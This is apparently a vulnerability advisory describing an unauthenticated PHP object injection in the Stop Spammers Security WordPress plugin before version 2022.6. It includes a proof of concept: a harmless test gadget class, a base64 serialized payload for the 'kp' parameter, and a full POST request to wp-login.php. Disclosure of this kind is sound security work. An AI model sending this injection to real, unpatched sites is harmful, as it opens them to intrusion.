WordPress Plugin Vulnerabilities
Stop Spammers Security < 2022.6 - Unauthenticated PHP Object Injection
Description
The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain
Proof of Concept
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};)
POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Connection: close
Upgrade-Insecure-Requests: 1
kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=
Affects Plugins
Fixed in version 2022.6
References
Classification
Miscellaneous
Original Researcher
Seryeon Ham
Submitter
Seryeon Ham
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-12-05 (about 3 months ago)
Added
2022-12-05 (about 3 months ago)
Last Updated
2022-12-05 (about 3 months ago)